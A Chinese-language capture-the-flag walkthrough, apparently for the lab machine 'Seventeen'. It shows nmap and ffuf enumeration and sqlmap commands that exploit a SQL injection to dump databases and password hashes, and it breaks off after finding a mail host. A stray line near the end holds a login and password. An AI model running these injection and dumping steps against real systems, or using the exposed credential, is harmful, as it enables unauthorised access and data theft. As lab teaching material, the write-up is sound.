艰难的机器 艰难的开始
Synopsis
一堆虚拟主机,都添加了一些最终的落地执行,站点中有一个基于布尔值的SQL注入,获取对数据库的访问。其中会泄漏另一个虚拟主机和他的数据库,旧管理系统提供的文件上传,并泄漏 Roundcube 网络邮件实例中的主机名。上传一个 Webshell 并利用 Roundcube 中的 CVE-2020-12640 来包含并执行。通过流氓 NPM 服务器安装恶意 Node 模块获得root权限之前,密码重用有两个关键点。
Skills Required
- Enumeration
- SQL injection
- Source code review
Skills Learned
- PHP file inclusion,
- Npm usage.
- Npm registry(Npm注册表)
Enumeration
$ ports=$(nmap -p- --min-rate=1000 -T4 10.10.11.165 | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)
$ nmap -p$ports -sC -sV 10.10.11.165
Nmap扫描显示三个端口开放,22 运行 SSH 服务,80 和 8000 上运行不同版本的 Apache 服务。由于目前没有 SSH 凭证,我们应该分别访问并枚举 80, 8000 端口。
Apache - Port 8000
![[Pasted image 20220925224118.png]]
Apache - Port 80
静态页面,痛过爬虫、目录扫描后未发现利用点。使用 ffuf
扫描子域名,发现 exam.seventeen.htb
。
$ ffuf -H 'Host: FUZZ.seventeen.htb' -u 'http://seventeen.htb' -w /usr/share/seclists/Discovery/Web-Content/raft small-directories-lowercase.txt -fw
2760
________________________________________________
:: Method : GET
:: URL : http://seventeen.htb
:: Wordlist : FUZZ: /usr/share/seclists/Discovery/Web-Content/raft-small-directories-lowercase.txt
:: Header : Host: FUZZ.seventeen.htb
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200,204,301,302,307,401,403,405,500
:: Filter : Response words: 2760
________________________________________________
exam [Status: 200, Size: 17375, Words: 3222, Lines: 348, Duration: 51ms]
:: Progress: [17770/17770] :: Job [1/1] :: 1879 req/sec :: Duration: [0:00:21] :: Errors: 0 ::
写入本地 hosts
文件解析
$ echo "10.10.11.165 exam.seventeen.htb" | sudo tee -a /etc/hosts
使用 searchsploit
搜索 exam 系统相关漏洞
$ searchsploit exam manager system
------------------------------------------------------------------------------------------------------------ ---------------------------------
Exploit Title | Path
------------------------------------------------------------------------------------------------------------ ---------------------------------
Exam Hall Management System 1.0 - Unrestricted File Upload (Unauthenticated) | php/webapps/50103.php
Exam Hall Management System 1.0 - Unrestricted File Upload + RCE (Unauthenticated) | php/webapps/50111.py
Exam Reviewer Management System 1.0 - Remote Code Execution (RCE) (Authenticated) | php/webapps/50726.txt
Exam Reviewer Management System 1.0 - ‘id’ SQL Injection | php/webapps/50725.txt
------------------------------------------------------------------------------------------------------------ ---------------------------------
Shellcodes: No Results
没有凭据,优先考虑不需要身份验证的漏洞。查看如何能够利用SQL注入漏洞,文件中已列出payload信息,注入点为参数 id
。
$ searchsploit -x /php/webapps/50725.txt
# Exploit Title: Exam Reviewer Management System 1.0 - <E2><80><98>id<E2><80><99> SQL Injection
# Date: 2022-02-18
<SNIP>
*SQLMAP COMMAND*
*# sqlmap -u "127.0.0.1/erms/?p=take_exam&id=1
<http://127.0.0.1/erms/?p=take_exam&id=1>" -p id --dbs --level 3*
sqlmap
$ sqlmap -u "http://exam.seventeen.htb/p=take_exam&id=1" -p id --dbs --level 3 --batch #获取库名
<SNIP>
available databases [4]:
[*] db_sfms
[*] erms_db
[*] information_schema
[*] roundcubedb
$ sqlmap -u "http://exam.seventeen.htb/?p=take_exam&id=1" -p id --dbs --level 3 --batch - D db_sfms --tables
[3 tables]
+---------+
| user |
| storage |
| student |
+---------+
$ sqlmap -u "http://exam.seventeen.htb/p=take_exam&id=1" -p id --dbs --level 3 --batch -D db_sfms -T student --threads=10 --dump
Database: db_sfms
Table: student
[4 entries]
+---------+----+--------+---------+----------+----------------------------------------------------+-----------+
| stud_id | yr | gender | stud_no | lastname | password | firstname |
+---------+----+--------+---------+----------+----------------------------------------------------+-----------+
| 1 | 1A | Male | 12345 | Smith | 1a40620f9a4ed6cb8d81a1d365559233 | John |
| 2 | 2B | Male | 23347 | Mille | abb635c915b0cc296e071e8d76e9060c | James |
| 3 | 2C | Female | 31234 | Shane | a2afa567b1efdb42d8966353337d9024 (autodestruction) | Kelly |
| 4 | 3C | Female | 43347 | Hales | a1428092eb55781de5eb4fd5e2ceb835 | Jamie |
+---------+----+--------+---------+----------+----------------------------------------------------+-----------+
上级目录/ver/www 下文件夹 oldmanagement 可以猜测是否为另一个虚拟主机
$ sqlmap -u "http://exam.seventeen.htb/p=take_exam&id=1" -p id --dbs --level 3 --batch -D erms_db -T users --threads=10 --dump
Database: erms_db
Table: users
[3 entries]
+----+------+-----------------------------------+----------+----------------------------------+------------------+--------------+---------------------+------------+---------------------+
| id | type | avatar | lastname | password | username | firstname | date_added | last_login | date_updated |
+----+------+-----------------------------------+----------+----------------------------------+------------------+--------------+---------------------+------------+---------------------+
| 1 | 1 | ../oldmanagement/files/avatar.png | Admin | fc8ec7b43523e186a27f46957818391c | admin | Adminstrator | 2021-01-20 14:02:37 | NULL | 2022-02-24 22:00:15 |
| 6 | 2 | ../oldmanagement/files/avatar.png | Anthony | 48bb86d036bb993dfdcf7fefdc60cc06 | UndetectableMark | Mark | 2021-09-30 16:34:02 | NULL | 2022-05-10 08:21:39 |
| 7 | 2 | ../oldmanagement/files/avatar.png | Smith | 184fe92824bea12486ae9a56050228ee | Stev1992 | Steven | 2022-02-22 21:05:07 | NULL | 2022-02-24 22:00:24 |
+----+------+-----------------------------------+----------+----------------------------------+------------------+--------------+---------------------+------------+---------------------+
$ echo '10.129.227.143 oldmanagement.seventeen.htb' | sudo tee -a /etc/hosts
获取一个登陆页面,使用学号➕密码登陆,前面sqlmap跑出来的密码可以登陆。 ![[Pasted image 20220929163252.png]] 有一可以下载的pdf和文件上传功能,查看pdf文件,得到mastermailer.seventeen.htb虚拟主机 ![[Pasted image 20220929163718.png]]
$ echo '10.129.119.55 mastermailer.seventeen.htb' | sudo tee -a /etc/hosts
IP: 10.129.119.55 parrot: htb-ovuln@htb-q8thfpvb4i.htb-cloud.com 7R6iTapk